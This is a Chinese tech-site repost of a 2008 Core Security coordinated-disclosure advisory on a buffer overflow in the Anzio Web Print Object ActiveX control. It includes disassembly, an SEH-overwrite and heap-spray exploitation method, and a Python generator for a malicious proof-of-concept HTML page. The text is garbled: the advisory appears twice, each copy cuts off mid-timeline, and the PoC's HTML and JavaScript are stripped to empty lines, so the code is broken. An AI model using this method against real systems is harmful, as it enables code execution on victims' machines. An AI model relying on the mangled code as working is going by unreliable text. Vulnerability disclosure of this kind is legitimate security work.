您现在的位置是:网站首页> 编程资料编程资料
Anzio Web Print Object _Exploit_网络安全_
2023-05-24
459人已围观
简介 Anzio Web Print Object _Exploit_网络安全_
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1 ~ Core Security Technologies - CoreLabs Advisory
~ http://www.coresecurity.com/corelabs/ ~ Anzio Web Print Object Buffer Overflow
*Advisory Information* Title: Anzio Web Print Object Buffer Overflow
Advisory ID: CORE-2008-0624
Advisory URL:
http://www.coresecurity.com/content/anzio-web-print-object-buffer-overflow
Date published: 2008-08-20
Date of last update: 2008-08-20
Vendors contacted: Anzio
Release mode: Coordinated release
*Vulnerability Information* Class: Buffer overflow
Remotely Exploitable: Yes (client side)
Locally Exploitable: No
Bugtraq ID: 30545
CVE Name: CVE-2008-3480
*Vulnerability Description* Anzio Web Print Object (WePO) is a Windows ActiveX web page component
that, when placed on a web page can "push" a print job from a file or
web server to a user's local printer without having to display the HTML
equivalent to that user. By placing WePO code on a web page, you can
provide a method whereby the viewer of that web page can request a local
print of a host resident print job, archived print job or a report
stream through a server-side script request. Anzio Web Print Object is vulnerable to a buffer overflow attack, which
can be exploited by remote attackers to execute arbitrary code, by
providing a malicious web page with a long "mainurl" parameter for the
WePO ActiveX component.
*Vulnerable Packages* . Anzio Web Print Object 3.2.19
. Anzio Web Print Object 3.2.24
. Anzio Print Wizard Server Edition 3.2.19
. Anzio Print Wizard Personal Edition 3.2.19
. Older versions are probably affected too, but were not checked.
*Non-vulnerable Packages* . Anzio Web Print Object 3.2.30
*Vendor Information, Solutions and Workarounds* Update to Anzio Web Print Object 3.2.30, available at
http://www.anzio.com/download-wepo.htm, or visit the vendor homepage at
http://www.anzio.com.
*Credits* This vulnerability was discovered and researched by Francisco Falcon
from Core Security Technologies.
*Technical Description / Proof of Concept Code* The WePO ActiveX component has a parameter named "mainurl" that
indicates the local file name or the URL from where to retrieve the
content to print: /----------- - -----------/ WePO takes the value of "mainurl" parameter in OLECHAR format and
transforms it to a BSTR string using the API SysAllocStringLen from
oleaut32.dll. The pointer to a BSTR string returned by SysAllocStringLen
is stored in the stack. /----------- 024F64B8 . 51 PUSH ECX
~ ; length of "mainurl" value
024F64B9 . 52 PUSH EDX
~ ; pointer to "mainurl" value
024F64BA . E8 4DB0FFFF CALL JMP.oleaut32.SysAllocStringLen
024F64BF . 5A POP EDX
024F64C0 . 85C0 TEST EAX,EAX
024F64C2 .^0F84 94F9FFFF JE PWBUTT~1.024F5E5C
024F64C8 . 8902 MOV DWORD PTR DS:[EDX],EAX
~ ; ;Save BSTR pointer to stack
024F64CA > C3 RETN - -----------/ After that, it copies "mainurl" value in ASCII format to a buffer on the
stack, without validating its length. /----------- 024F300C /$ 56 PUSH ESI
024F300D |. 57 PUSH EDI
024F300E |. 89C6 MOV ESI,EAX
~ ; ESI = pointer to "mainurl" value
024F3010 |. 89D7 MOV EDI,EDX
~ ; EDI = pointer to destination buffer in the stack
024F3012 |. 89C8 MOV EAX,ECX
~ ; ECX = length of "mainurl" value
024F3014 |. 39F7 CMP EDI,ESI
024F3016 |. 77 13 JA SHORT PWBUTT~1.024F302B
024F3018 |. 74 2F JE SHORT PWBUTT~1.024F3049
024F301A |. C1F9 02 SAR ECX,2
024F301D |. 78 2A JS SHORT PWBUTT~1.024F3049
024F301F |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR
DS:[ESI] ; Copy "mainurl" value to stack buffer,
024F3021 |. 89C1 MOV ECX,EAX
~ ; without validating its length
024F3023 |. 83E1 03 AND ECX,3
024F3026 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
024F3028 |. 5F POP EDI
024F3029 |. 5E POP ESI
024F302A |. C3 RETN - -----------/ By supplying a web page with a long "mainurl" value, an attacker can
overflow the stack buffer mentioned above and overwrite the SEH
(Structured Exception Handler), enabling arbitrary code execution on the
machine that has the WePO ActiveX component installed. The Structured
Exception Handler can be overwritten by providing a "mainurl" value with
396 bytes as padding, plus 4 specially chosen bytes that will replace
the original SEH, allowing execution of arbitrary code with the
privileges of the current user. When providing such a long string as value for the "mainurl" parameter,
an access violation exception is generated when WePO object calls the
API SysFreeString to deallocate the BSTR string that was previously
created with SysAllocStringLen. The exception raises because the
original pointer to the BSTR string was replaced with 4 junk bytes from
the 396 padding bytes mentioned above. /----------- 024F5E98 |. 50 PUSH EAX
024F5E99 |. 52 PUSH EDX
~ ; junk, should be pointer to BSTR string
024F5E9A |. E8 7DB6FFFF CALL JMP.oleaut32.SysFreeString - -----------/ At this point, the Structured Exception Handler is already controlled by
the attacker, so when exception raises the execution is transferred to
an arbitrary memory address chosen by the person providing the malicious
web page. By adding JavaScript code in the malicious web page, the attacker can
use a technique called Heap Spray, that fills the heap of the browser
process with his payload, and then jump to the arbitrary code located in
the process heap. The following Python code will generate an HTML file that, when opened
on a machine with Web Print Object installed, will launch the Windows
Calculator as a proof of the possibility to execute arbitrary code on a
machine that has the vulnerable ActiveX component installed. This Proof
of Concept was tested in Windows XP Professional SP2 with Internet
Explorer 6.0.2900.2180, and Windows XP Professional SP3 with Internet
Explorer 6.0.2900.3264, but can be easily modified to work in other
platforms. /----------- malicioushtml = open('WePO-PoC.html','w')
header = '''
WePO Buffer Overflow PoC
'''
malicioushtml.write(header)
objeto = '''
~ classid="clsid:4CE8026D-5DBF-48C9-B6E9-14A2B1974A3D"
~
codebase="http://www.anzio.com/controls30/printwizocx.cab#version=3,0,0,0"
~ width=0
~ height=0
~ align=center
~ hspace=0
~ id="botontrigger"
|
'''
malicioushtml.write(objeto)
craftedparam = ''
malicioushtml.write(craftedparam)
jscode = '''
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
'''
malicioushtml.write(jscode)
malicioushtml.close() - -----------/
*Report Timeline* . 2008-06-27: Core Security Technologies notifies Anzio that there is a
vulnerability in Web Print Object (WePO).
. 2008-06-28: Vendor acknowledges notification.
. 2008-07-01: Core sends an advisory draft, containing technical details
and Proof of Concept code for the vulnerability.
. 2008-07-08: Core asks for confirmation of the vulnerability, and
reminds the vendor that the advisory's publication date is set to July
14th, 2008.
. 2008-07-08: Vendor asks Core to resend the report.
. 2008-07-14: Core sends (again) the advisory draft, and asks for
information about the vendor's plan for fixing the vulnerability.<
Hash: SHA1 ~ Core Security Technologies - CoreLabs Advisory
~ http://www.coresecurity.com/corelabs/ ~ Anzio Web Print Object Buffer Overflow
*Advisory Information* Title: Anzio Web Print Object Buffer Overflow
Advisory ID: CORE-2008-0624
Advisory URL:
http://www.coresecurity.com/content/anzio-web-print-object-buffer-overflow
Date published: 2008-08-20
Date of last update: 2008-08-20
Vendors contacted: Anzio
Release mode: Coordinated release
*Vulnerability Information* Class: Buffer overflow
Remotely Exploitable: Yes (client side)
Locally Exploitable: No
Bugtraq ID: 30545
CVE Name: CVE-2008-3480
*Vulnerability Description* Anzio Web Print Object (WePO) is a Windows ActiveX web page component
that, when placed on a web page can "push" a print job from a file or
web server to a user's local printer without having to display the HTML
equivalent to that user. By placing WePO code on a web page, you can
provide a method whereby the viewer of that web page can request a local
print of a host resident print job, archived print job or a report
stream through a server-side script request. Anzio Web Print Object is vulnerable to a buffer overflow attack, which
can be exploited by remote attackers to execute arbitrary code, by
providing a malicious web page with a long "mainurl" parameter for the
WePO ActiveX component.
*Vulnerable Packages* . Anzio Web Print Object 3.2.19
. Anzio Web Print Object 3.2.24
. Anzio Print Wizard Server Edition 3.2.19
. Anzio Print Wizard Personal Edition 3.2.19
. Older versions are probably affected too, but were not checked.
*Non-vulnerable Packages* . Anzio Web Print Object 3.2.30
*Vendor Information, Solutions and Workarounds* Update to Anzio Web Print Object 3.2.30, available at
http://www.anzio.com/download-wepo.htm, or visit the vendor homepage at
http://www.anzio.com.
*Credits* This vulnerability was discovered and researched by Francisco Falcon
from Core Security Technologies.
*Technical Description / Proof of Concept Code* The WePO ActiveX component has a parameter named "mainurl" that
indicates the local file name or the URL from where to retrieve the
content to print: /----------- - -----------/ WePO takes the value of "mainurl" parameter in OLECHAR format and
transforms it to a BSTR string using the API SysAllocStringLen from
oleaut32.dll. The pointer to a BSTR string returned by SysAllocStringLen
is stored in the stack. /----------- 024F64B8 . 51 PUSH ECX
~ ; length of "mainurl" value
024F64B9 . 52 PUSH EDX
~ ; pointer to "mainurl" value
024F64BA . E8 4DB0FFFF CALL JMP.oleaut32.SysAllocStringLen
024F64BF . 5A POP EDX
024F64C0 . 85C0 TEST EAX,EAX
024F64C2 .^0F84 94F9FFFF JE PWBUTT~1.024F5E5C
024F64C8 . 8902 MOV DWORD PTR DS:[EDX],EAX
~ ; ;Save BSTR pointer to stack
024F64CA > C3 RETN - -----------/ After that, it copies "mainurl" value in ASCII format to a buffer on the
stack, without validating its length. /----------- 024F300C /$ 56 PUSH ESI
024F300D |. 57 PUSH EDI
024F300E |. 89C6 MOV ESI,EAX
~ ; ESI = pointer to "mainurl" value
024F3010 |. 89D7 MOV EDI,EDX
~ ; EDI = pointer to destination buffer in the stack
024F3012 |. 89C8 MOV EAX,ECX
~ ; ECX = length of "mainurl" value
024F3014 |. 39F7 CMP EDI,ESI
024F3016 |. 77 13 JA SHORT PWBUTT~1.024F302B
024F3018 |. 74 2F JE SHORT PWBUTT~1.024F3049
024F301A |. C1F9 02 SAR ECX,2
024F301D |. 78 2A JS SHORT PWBUTT~1.024F3049
024F301F |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR
DS:[ESI] ; Copy "mainurl" value to stack buffer,
024F3021 |. 89C1 MOV ECX,EAX
~ ; without validating its length
024F3023 |. 83E1 03 AND ECX,3
024F3026 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
024F3028 |. 5F POP EDI
024F3029 |. 5E POP ESI
024F302A |. C3 RETN - -----------/ By supplying a web page with a long "mainurl" value, an attacker can
overflow the stack buffer mentioned above and overwrite the SEH
(Structured Exception Handler), enabling arbitrary code execution on the
machine that has the WePO ActiveX component installed. The Structured
Exception Handler can be overwritten by providing a "mainurl" value with
396 bytes as padding, plus 4 specially chosen bytes that will replace
the original SEH, allowing execution of arbitrary code with the
privileges of the current user. When providing such a long string as value for the "mainurl" parameter,
an access violation exception is generated when WePO object calls the
API SysFreeString to deallocate the BSTR string that was previously
created with SysAllocStringLen. The exception raises because the
original pointer to the BSTR string was replaced with 4 junk bytes from
the 396 padding bytes mentioned above. /----------- 024F5E98 |. 50 PUSH EAX
024F5E99 |. 52 PUSH EDX
~ ; junk, should be pointer to BSTR string
024F5E9A |. E8 7DB6FFFF CALL JMP.oleaut32.SysFreeString - -----------/ At this point, the Structured Exception Handler is already controlled by
the attacker, so when exception raises the execution is transferred to
an arbitrary memory address chosen by the person providing the malicious
web page. By adding JavaScript code in the malicious web page, the attacker can
use a technique called Heap Spray, that fills the heap of the browser
process with his payload, and then jump to the arbitrary code located in
the process heap. The following Python code will generate an HTML file that, when opened
on a machine with Web Print Object installed, will launch the Windows
Calculator as a proof of the possibility to execute arbitrary code on a
machine that has the vulnerable ActiveX component installed. This Proof
of Concept was tested in Windows XP Professional SP2 with Internet
Explorer 6.0.2900.2180, and Windows XP Professional SP3 with Internet
Explorer 6.0.2900.3264, but can be easily modified to work in other
platforms. /----------- malicioushtml = open('WePO-PoC.html','w')
header = '''
'''
malicioushtml.write(header)
objeto = '''
~
codebase="http://www.anzio.com/controls30/printwizocx.cab#version=3,0,0,0"
~ width=0
~ height=0
~ align=center
~ hspace=0
~ id="botontrigger"
|
'''
malicioushtml.write(objeto)
craftedparam = ''
malicioushtml.write(craftedparam)
jscode = '''
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
'''
malicioushtml.write(jscode)
malicioushtml.close() - -----------/
*Report Timeline* . 2008-06-27: Core Security Technologies notifies Anzio that there is a
vulnerability in Web Print Object (WePO).
. 2008-06-28: Vendor acknowledges notification.
. 2008-07-01: Core sends an advisory draft, containing technical details
and Proof of Concept code for the vulnerability.
. 2008-07-08: Core asks for confirmation of the vulnerability, and
reminds the vendor that the advisory's publication date is set to July
14th, 2008.
. 2008-07-08: Vendor asks Core to resend the report.
. 2008-07-14: Core sends (again) the advisory draft, and asks for
information about the vendor's plan for fixing the vulnerability.<
相关内容
- Ultrastats _Exploit_网络安全_
- Mole Group Real Estate Script _Exploit_网络安全_
- trixbox (langChoice) Local File Inclusion Exploit (connect-back) _Exploit_网络安全_
- Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities _Exploit_网络安全_
- BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit _Exploit_网络安全_
- Mole Group Last Minute Script _Exploit_网络安全_
- Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln _Exploit_网络安全_
- AuraCMS _Exploit_网络安全_
- BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability _Exploit_网络安全_
- Dreampics Builder (page) Remote SQL Injection Vulnerability _Exploit_网络安全_
